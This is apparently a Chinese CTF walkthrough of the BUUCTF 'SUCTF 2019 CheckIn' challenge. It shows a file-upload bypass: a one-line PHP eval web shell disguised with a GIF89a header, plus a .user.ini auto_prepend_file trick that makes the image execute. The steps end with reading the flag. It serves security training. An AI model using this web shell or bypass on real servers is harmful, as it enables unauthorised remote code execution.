BUUCTF---web---[SUCTF 2019]CheckIn

1、点击题目连接来到页面

2、上传正常的jpg文件,提示内容不能有<?。本来打算上传图片马,但是有过滤

3、可以改成下面的图片马:

<script language='php'>@eval($_POST['cmd']);</script>

 4、将上面的一句话木马先写成txt再修改后缀为test.jpg后上传

5、必须要是图片类型,将一句话木马,添加图片头后再上传

6、上传成功了,但是需要让图片马当成php代码来执行

.user.ini文件内容为:(文件命名必须和上传的图片马文件名一样,我这里是test.jpg)

GIF89a                  
auto_prepend_file=test.jpg

7、先上传.user.ini文件,再上传图片马test.jpg。上传.user.ini后出现下面回显

8、访问下面url,页面回显

http://9974cc70-c14b-48f5-b8df-d5b5460498c5.node5.buuoj.cn:81/uploads/4247b8a5da98794f37ad36c75aaa5631/index.php

 

9、测试,发现文件上传成功

10、使用系统函数,查看文件根目录,发现flag文件

11、输出flag

flag{cdf7e33f-1c42-4715-b628-8780eddfe13d}

相关推荐

  1. [安洵杯 2019]game & [SUCTF2018]babyre

    2024-06-11 23:12:04       36 阅读
  2. BUUCTF)actf_2019_actfnote

    2024-06-11 23:12:04       36 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-06-11 23:12:04       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-06-11 23:12:04       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-06-11 23:12:04       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-06-11 23:12:04       20 阅读

热门阅读

  1. Spring Boot 事务传播机制详解

    2024-06-11 23:12:04       8 阅读
  2. 编程爱情——向日葵(小说)

    2024-06-11 23:12:04       6 阅读
  3. 道路运输安全员真题考试题库分享

    2024-06-11 23:12:04       7 阅读
  4. 【python】时间和日期

    2024-06-11 23:12:04       8 阅读
  5. Web前端后端框架:深度剖析与发展趋势

    2024-06-11 23:12:04       7 阅读
  6. 主题切换之根元素CSS自定义类

    2024-06-11 23:12:04       9 阅读
  7. 怎么使用join将数组转为逗号分隔的字符串

    2024-06-11 23:12:04       7 阅读
  8. 最大二叉树-力扣

    2024-06-11 23:12:04       5 阅读
  9. 数组中的map方法

    2024-06-11 23:12:04       6 阅读
  10. RV32I指令集

    2024-06-11 23:12:04       8 阅读
  11. Redis的过期策略以及内存淘汰机制

    2024-06-11 23:12:04       7 阅读